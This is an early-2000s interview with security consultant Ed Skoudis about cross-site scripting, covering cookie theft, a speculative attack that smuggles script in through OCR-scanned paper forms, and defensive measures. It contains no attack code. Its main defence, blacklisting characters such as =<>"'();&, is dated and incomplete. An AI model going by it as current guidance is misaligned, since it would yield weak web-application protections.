With Ed Skoudis, senior security consultant with International Network Services Inc., a consultancy in Santa Clara, CA. Skoudis’ new book, Malware: Fighting Malicious Code, includes a discussion of cross-site scripting (XSS), an application-level attack in which hackers use an enterprise’s own code against it to get control of a Web application database.
This interview originally appeared in the IT Business Edge weekly report, “Fortifying Network Security.” To see a complete listing of IT Business Edge weekly reports or sign up for this free technology intelligence agent, visit www.itbusinessedge.com.
By Terry Sweeney
Question: Based on the amount of cross-site scripting (XSS) on the Internet in late 2003, what’s your forecast for this sort of online malice for this year?
Skoudis: Enterprises are deploying broken applications and introducing more holes in existing programs much faster than they’re cleaning them up. XSS vulnerabilities are really easy for Web developers to accidentally introduce. However, if they follow some simple recommendations, such as filtering out characters associated with scripting attacks (like =<>”‘();&) on both the input and output, we wouldn’t have to face this malice. I always try to be an optimist, but I’m expecting many more of these kinds of attacks in 2004. We might see an increase in 2004 involving paper-based XSS attacks. Although it may sound silly, an attacker could submit a paper-based form to an organization via postal mail. Many companies perform data entry using Optical Character Recognition (OCR). By writing a script into a field on a form and sending it in, the OCR may actually load the script itself into a database. Then, at a later time, an employee of the target company may view the submitted data via a browser. When the script stored in the database reaches the employee’s browser, it can perform some nasty actions on the browser.
Question: How is the average enterprise most likely to be affected by XSS? Stolen passwords, misappropriation of funds, network outages?
Skoudis: Using an XSS attack to submit data to an employee who views the data with a browser would allow the attacker to steal data from that employee’s browser, including cookies. So, a company should analyze what kind of information its users have inside their cookies. What could an attacker do with this data? Does it include personally identifiable information? Do cookies contain account numbers or balances? This data could be exposed to a bad guy via this kind of attack.
Question: What measures should enterprises take to protect themselves against XSS? Where are the security dollars best spent?
Skoudis: They should deploy filters for all incoming and outgoing data in their Web applications. Remove all potential scripts for any data as soon as it arrives or leaves the application. This quick fix is usually very low-cost, provided that the organization has the ability to tweak the code for its Web applications. Additionally, on the client side, make sure your browsers are patched and up to date. Frequently visit www.windowsupdate.com or deploy a thorough patch management solution. By keeping the browsers patched, the worst forms of XSS attacks are far less likely.